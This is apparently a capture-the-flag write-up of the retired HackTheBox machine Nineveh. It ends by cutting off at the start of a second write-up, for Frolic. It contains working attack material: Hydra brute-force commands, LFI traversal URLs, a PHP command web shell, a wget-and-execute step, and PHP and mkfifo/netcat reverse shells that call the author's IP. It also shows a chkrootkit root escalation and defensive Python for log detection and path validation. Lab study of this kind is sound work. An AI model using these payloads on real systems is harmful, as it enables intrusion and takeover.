
Hackthebox.eu - Retired - Nineveh




Recon

I start with a simple up/down scan of all TCP ports.


nmap -T4 -p- -oX ./nmapb.xml nineveh.htb


Then I convert the output to HTML to make it easier to read.


xsltproc ./nmapb.xml -o ./nmapb.html




Looks like just ports 80 and 443 are open: a web server.


Let's run nmap again with the -A switch to run all the scripts against just these two ports.



nmap -T4 -p80,443 -A -oX ./nmapf.xml nineveh.htb


Then convert that to HTML too.



xsltproc ./nmapf.xml -o ./nmapf.html




Looks like we have Apache 2.4.18 running on an Ubuntu server.


Let’s browse 80 and 443 to see what it serves up.


Port 80


SSL / Port 443



Here is the cert info for SSL.


Not much help there.


Let's start scanning these websites and see if we can find something. We will search against both ports, since they could be serving different files.




I'll start with Nikto on port 80.


nikto -h http://nineveh.htb





info.php is available, a default Apache page that gives a lot of info on the web server.


It also looks like it might be vulnerable to RFI (Remote File Inclusion).


Dirb on port 80 gave us just some default results.



info.php, which we already know about from Nikto; index.html, the default web page; and server-status, which we aren't allowed to view.




Dirbuster found http://nineveh.htb/department/


Dirb on port 443 gave another location: https://nineveh.htb/db



phpLiteAdmin 1.9


Dirb and Nikto didn't give me anything else to go on for a password here, so we are going to move over to exploitation and try to brute force this login page using Hydra.








Exploit


https://tools.kali.org/password-attacks/hydra


Hydra is a brute force tool that can be used to attack things like websites, FTP and a bunch of other services. It has a lot of different switches, and it took me a good 20 minutes to get all my settings right in order for this attack to work.


Before we can get to Hydra we need to look at the login to get the parameters we need to feed into Hydra.


So let's fire up Burp and capture a failed login attempt.


Here is the screenshot of the failed login attempt.


We need to gather the highlighted information to give to Hydra.



We need to know the site we want Hydra to attack, what parameters are being passed to the website, and what a failed response looks like.


So here is the final command we are going to issue to Hydra. I'll break it down a little further below.


hydra -P /usr/share/wordlists/rockyou.txt nineveh.htb http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect"   -S -l ''




Let’s walk through all the switches here.


-P this switch indicates that we are going to use a password list

nineveh.htb this is the domain we are attacking

http-post-form this is the type of request being used

"/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" this is the full form specification; let's break it down

/db/index.php this is the actual login page

password=^PASS^ ^PASS^ is the placeholder that Hydra replaces with each entry from our word list

&remember=yes&login=Log+In&proc_login=true

These are the other parameters the website is expecting

:Incorrect this is the failed login message we get

-S indicates the site uses SSL

-l '' supplies an empty username
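Seen from the defender's side, a wordlist run like this one shows up in the Apache access log as a burst of POSTs to the login page from a single address. The following Python is an added example, not code from the original post: it parses combined-format log lines and flags any source IP that POSTs to a login path more than a threshold number of times inside a sliding window. The log lines are constructed, and the threshold and window values are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache combined-log format; each failed phpLiteAdmin login is one POST to /db/index.php.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return the log fields as a dict (timestamp parsed), or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], TS_FMT)
    return e

def find_bruteforce(lines, login_paths, threshold=20, window_s=60):
    """Map source IP -> peak number of POSTs to a login path inside any window_s-second
    window, for IPs that reached `threshold`. Status codes are deliberately ignored:
    phpLiteAdmin answers a wrong password with HTTP 200 and "Incorrect" in the body,
    so only the request rate stands out."""
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        e = parse_line(line)
        if e is None or e["method"] != "POST":
            continue
        if e["path"].split("?", 1)[0] not in login_paths:
            continue
        q = recent[e["ip"]]
        q.append(e["ts"])
        while (q[-1] - q[0]).total_seconds() > window_s:  # drop entries older than the window
            q.popleft()
        if len(q) >= threshold:
            flagged[e["ip"]] = max(flagged.get(e["ip"], 0), len(q))
    return flagged

# Constructed sample: 25 POSTs in 25 seconds from one address (a wordlist run),
# plus one ordinary login and a page view from another address.
SAMPLE_LOG = [
    f'10.10.14.18 - - [05/May/2021:16:17:{i:02d} +0000] "POST /db/index.php HTTP/1.1" 200 1337 "-" "Mozilla/5.0"'
    for i in range(25)
] + [
    '10.10.14.50 - - [05/May/2021:16:17:05 +0000] "POST /db/index.php HTTP/1.1" 200 1337 "-" "Mozilla/5.0"',
    '10.10.14.50 - - [05/May/2021:16:17:40 +0000] "GET /db/index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LOG, {"/db/index.php", "/department/login.php"}))
```

The same function covers the /department/login.php run later in the post by adding that path to the login set.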




Looks like our password is password123



not quite admin/admin but pretty damn close



Cool, we are logged in now.


Let's go back and run Hydra against that department login too.



Just like before, let's capture the login in Burp so we know what to feed Hydra.




I'm just going to assume there is a user named admin.


hydra -P /usr/share/wordlists/rockyou.txt nineveh.htb http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -l "admin"



Eventually we got back 1q2w3e4r5t as the password for admin.



After we log in we get:


Here is the notes section.






Looky there, it's calling a file to display ninevehNotes.txt. Let's see if we can use this for some LFI.





I started with just removing the files/ portion.

http://nineveh.htb/department/manage.php?notes=ninevehNotes.txt






Next I tried changing the file to /etc/passwd.


http://nineveh.htb/department/manage.php?notes=../../../../etc/passwd



Ok, let's add files/ninevehNotes.txt back but still with the /etc/passwd.


http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt/../../../../etc/passwd


Hmm, that is a different error. This one seems more like an Apache error than the other "no note selected" error. I suspect there is some sort of if statement behind this looking for the ninevehNotes part: if it's not there we get the generic "no note selected" error, but if it is there we get the Apache error.


Let's try it again but take the files/ part out again.


http://nineveh.htb/department/manage.php?notes=/ninevehNotes.txt/../../../../etc/passwd



That worked, so we do have some LFI here in the department page.
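To make that suspected filter concrete, here is an added Python model, not the box's own PHP (which the post never shows), of a keyword-only check beside a hardened resolver that allowlists the exact file name and confirms the real path stays under the notes directory. The notes directory path is an assumption; the payloads are the notes= values tried in this post.

```python
import os

# Assumed location of the notes directory on the box (not stated in the post).
NOTES_DIR = "/var/www/html/department/files"

# The notes= values tried in the post, in the order they were tried.
PAGE_PAYLOADS = [
    "ninevehNotes.txt",
    "../../../../etc/passwd",
    "files/ninevehNotes.txt/../../../../etc/passwd",
    "/ninevehNotes.txt/../../../../etc/passwd",
    "/var/tmp/ninevehNotes.php",
]

def naive_allows(notes):
    """Model of the check the post infers: the value only has to contain the keyword
    before it is handed to include(), so traversal placed after the keyword slips through."""
    return "ninevehNotes" in notes

def hardened_resolve(notes, base_dir=NOTES_DIR, allowed=("ninevehNotes.txt",)):
    """Allowlist the exact file name (no directory part at all), then confirm the
    resolved path is still inside base_dir, which also guards against a symlink
    dropped into the notes directory. Returns the absolute path to include, or None."""
    if notes not in allowed or os.path.basename(notes) != notes:
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, notes))
    if os.path.commonpath([base, target]) != base:
        return None
    return target

def compare(payloads=PAGE_PAYLOADS):
    """For each payload: (passes the naive keyword check, accepted by the hardened resolver)."""
    return {p: (naive_allows(p), hardened_resolve(p) is not None) for p in payloads}

if __name__ == "__main__":
    for payload, (naive, hard) in compare().items():
        print(f"{payload!r:55} naive={naive} hardened={hard}")
```

The keyword check passes every traversal and the /var/tmp path exactly as the post observed, while the hardened resolver accepts only the bare ninevehNotes.txt.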




Ok, now back to phpLiteAdmin. There is an exploit I found that we could use to execute some PHP that we create in a DB. For brevity I didn't include all my failed attempts to get this to work, but I can assure you they were numerous and very time consuming.


https://www.exploit-db.com/exploits/24044


So I created a DB named ninevehNotes.php (for the pesky filter).



I'm going to create a table named shell.


Then we will follow along with the exploit verbatim to see the POC here.


I created a text field named shell with the default value <?php phpinfo()?>




So it creates the DB in the /var/tmp/ directory, which is not visible to the internet… damnit.


But we did find the LFI on the department site; hopefully we can leverage that to call the PHP.


http://nineveh.htb/department/manage.php?notes=/var/tmp/ninevehNotes.php




Cool, cool, cool, cool: we were able to LFI our PHP "db".



Let's modify it again and see if we can get the box talking to us.


I’m just going to attempt to have it ping back to me first to make sure it allows outbound connections.


<?php exec('ping -c4 10.10.14.18')?>


I'll update the value to be this new PHP.


Then I set up a listener on my machine.


tcpdump -i tun0 -n icmp


Then refresh the notes page.



Ok, now we just need to modify this to hopefully get a shell session back instead of a ping.





Ok, we are going to use python to create a PHP variable that we can pass to system() directly.


<?php echo system($_REQUEST["cmd"]); ?>






So now if we just add &cmd=*** after our URL it should execute whatever we put there as www-data.


http://nineveh.htb/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=ls





I fought with just trying to execute a reverse shell using the "db" PHP and couldn't get it running.


Eventually I hosted a PHP file on my machine and used the db PHP to download and execute it.



My shell PHP, called circusmonkey.php:


<?php $sock=fsockopen("10.10.14.18",5555);exec("/bin/sh -i <&3 >&3 2>&3");?>


Then I inserted this code into the db to download and execute my PHP:


<?php system("wget http://10.10.14.18:8000/circusmonkey.php -O /tmp/circusmonkey.php; php /tmp/circusmonkey.php"); ?>



Set up a listener on my box:


nc -lvp 5555



Ok, we finally have a foothold.


Let's use python3 to get a slightly better shell here.


python3 -c 'import pty; pty.spawn("/bin/bash")'



Poking around in the www folder I found a folder called secure_notes.


There is simply an HTML page that displays a PNG, and the PNG file itself.



I browsed to that site and saw this:



Let's download this PNG and see if there is more to it than meets the eye.


I ran strings against it.


strings ./nineveh.png



And found some interesting output.



That sure looks like their private SSH key, which would be great if SSH were open.



But wait, SSH is open, just not to the internet….


So we should be able to use the private key we found to SSH into localhost as amrois.


I made a file called key.txt on my Kali box and used SimpleHTTPServer to download it to nineveh.


ssh -i ./key.txt amrois@localhost (don't forget to chmod 600 ./key.txt to tighten the permissions on the file, or ssh will complain)




Let's get that hash, yo.



Next I used my existing SimpleHTTPServer to download linpeas.sh to nineveh.




What is this?



A script to delete text files in /report.


I did a cat on all the files in the directory.


Looks like the output of a program that is looking for rootkits?


I grabbed one line and googled it.



This was among the top results:


https://forums.linuxmint.com/viewtopic.php?t=274218



Looks like a program called chkrootkit.


Googling around for a vulnerability in this program, I found this:



https://lepetithacker.wordpress.com/2017/04/30/local-root-exploit-in-chkrootkit/


Apparently if we place a file called update in the /tmp directory it will be executed as root when the program is run.


Considering the reports are being deleted every minute, I'm guessing chkrootkit is running on the same schedule, even though I didn't see it in the cron jobs... something else must be running it.



So as a POC I'm just going to make an executable that reads /root/root.txt and copies it to a directory I can read.


My update script:


cat /root/root.txt > /tmp/circusmonkey2/root.txt


I placed the file in the /tmp directory and gave it executable rights.


chmod +x ./update


Then I checked my output folder.


There we got our hash, but what about a root shell? It should be trivial now that we have found this exploit.


Well, looks like I figured out why my tries with netcat weren't working when trying to get a foothold.


But mkfifo seems to work fine.


rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.18 3333 >/tmp/f



So let's update our update script to have this instead.


Wait for chkrootkit to run.



Much better.



This box was a doozy, one of the more difficult ones I've done lately.




HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar